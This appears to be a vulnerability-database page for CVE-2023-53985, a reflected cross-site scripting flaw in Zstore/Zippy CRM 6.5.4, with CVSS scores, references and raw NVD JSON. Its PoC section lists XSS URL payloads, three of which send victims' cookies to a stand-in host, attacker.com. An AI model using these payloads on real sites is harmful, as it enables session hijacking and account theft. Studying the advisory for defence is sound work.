CVE-2023-53985

Description

Zstore, now referred to as Zippy CRM, 6.5.4 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts through unvalidated input parameters. Attackers can submit crafted payloads in manual insertion points to execute arbitrary JavaScript code in victim's browser context.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zippy:zstore:6.5.4:*:*:*:*:*:*:* - VULNERABLE

Zstore < 6.5.4

Zstore 6.5.4 (受影响的版本)

Zippy CRM (受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2023-53985 PoC - Reflected XSS in Zstore/Zippy CRM 6.5.4 -->
<!-- Modify the 'param' parameter with your XSS payload -->

<!-- Basic XSS PoC -->
https://target-site.com/zstore/index.php?param=<script>alert('XSS')</script>

<!-- Cookie Stealing PoC -->
https://target-site.com/zstore/index.php?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- Session Hijacking PoC -->
https://target-site.com/zstore/index.php?param=<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">

<!-- HTML Injection + XSS -->
https://target-site.com/zstore/index.php?param=<svg/onload=fetch('https://attacker.com/?data='+btoa(document.cookie))>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53985
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53985
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53985/
[4] VulDB https://vuldb.com/cve/CVE-2023-53985
[5] https://github.com/leon-mbs/zstore
[6] https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4
[7] https://www.exploit-db.com/exploits/51207
[8] https://www.vulncheck.com/advisories/zstore-reflected-cross-site-scripting-xss
[9] https://zippy.com.ua/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53985", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.607", "lastModified": "2026-02-27T19:53:35.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zstore, now referred to as Zippy CRM, 6.5.4 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts through unvalidated input parameters. Attackers can submit crafted payloads in manual insertion points to execute arbitrary JavaScript code in victim's browser context."}, {"lang": "es", "value": "Zstore, ahora conocido como Zippy CRM, 6.5.4 contiene una vulnerabilidad de cross-site scripting reflejado que permite a los atacantes inyectar scripts maliciosos a través de parámetros de entrada no validados. Los atacantes pueden enviar cargas útiles manipuladas en puntos de inserción manuales para ejecutar código JavaScript arbitrario en el contexto del navegador de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zippy:zstore:6.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "692F8073-A5D7-417D-8317-AC04ADAFA198"}]}]}], "references": [{"url": "https://github.com/leon-mbs/zstore", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51207", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/zstore-reflected-cross-site-scripting-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://zippy.com.ua/", "source": "[email protected]", "tags": ["Product"]}]}}